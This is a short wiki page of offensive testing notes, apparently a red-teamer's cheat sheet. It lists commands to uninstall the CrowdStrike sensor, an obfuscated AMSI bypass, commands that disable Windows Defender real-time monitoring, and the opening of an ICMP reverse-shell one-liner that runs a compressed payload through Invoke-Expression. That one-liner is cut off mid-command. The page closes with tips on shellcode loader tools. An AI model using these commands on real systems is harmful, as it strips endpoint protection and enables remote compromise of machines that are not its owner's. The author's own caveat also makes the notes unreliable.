Wiki with some of my testing notes, no garuntee they'll work for you or be accurate.
GLHF
Bypass CrowdStrike wmic product where "description='CrowdStrike Sensor Platform'" Uninstall
Bypass AMSI powershell [Ref].Assembly.GetType('System.Management.Automation.' + 'A' + 'm' + 's' + 'i' + 'Utils').GetField('a' + 'm' + 's' + 'i' + 'InitFailed','NonPublic,Static').SetValue($null,$true)
Disable Windows Defender: powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $True
ICMP reverse shell oneliner
powershell [Ref].Assembly.GetType('System.Management.Automation.' + 'A' + 'm' + 's' + 'i' + 'Utils').GetField('a' + 'm' + 's' + 'i' + 'InitFailed','NonPublic,Static').SetValue($null,$true); Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream (
Note: CACTUSTORCH does not make any Kernel32 API declarations. Shellter has been fairly solid as well.